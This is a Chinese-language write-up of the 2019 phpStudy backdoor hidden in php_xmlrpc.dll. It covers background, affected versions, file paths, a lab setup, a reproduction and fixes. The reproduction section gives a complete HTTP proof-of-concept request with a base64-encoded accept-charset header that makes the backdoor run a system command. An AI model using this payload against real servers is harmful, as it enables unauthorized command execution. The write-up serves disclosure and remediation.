phpStudy后门漏洞利用及修复

0x01 漏洞简介

事件背景

　　北京时间9月20日，杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文，文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发，近百万PHP用户中超过67万用户已被黑客控制，并大肆盗取账号密码、聊天记录、设备码类等敏感数据多达10万多组，非法牟利600多万元。

• 漏洞：程序包自带的PHP的php_xmlrpc.dll模块中有隐藏后门

• php.ini中必须要引用该模块，这样才能去复现该漏洞，若开启了xmlrpc功能，php就会加载这个php_xmlrpc.dll动态链接库文件，其中的恶意代码就会被触发

• 方法1：通过php.ini配置文件查看，位置D:\phpStudy\PHPTutorial\php\php-5.4.45\ext

• 查看是否引用该模块：

• 方法2：通过phpinfo查看

• 影响版本：phpstudy 2016（php5.4/5.2） phpstudy 2018（php5.4/5.2）

0x02 影响版本

phpstudy 2016版php-5.4

phpstudy 2018版php-5.2.17

phpstudy 2018版php-5.4.45

0x03 后门位置

后门代码存在于\ext\php_xmlrpc.dll模块中

phpStudy2016和phpStudy2018自带php-5.2.17、php-5.4.45

phpStudy2016路径

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018路径

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

0x04 环境搭建

使用带后门的phpstudy进行搭建在www目录写一个index.pnp

<?php 
echo “helloworld!”;
?>

0x05 漏洞复现

访问这个页面进行抓包将修改一下内容

accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7      //字段需要进行base64编码
Accept-Encoding: gzip,deflate         //deflate前面的空格去掉

POC

GET / HTTP/1.1
Host: 192.168.4.113
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1
Content-Length: 2

0x06 漏洞修复

1.在官网中下载最新的PhpStudy

2.将PhpStudy中php5.4和php5.2里面的php_xmlrpc.dll替换为官方的文件

3.使用phpstudy安全自检修复程序2.0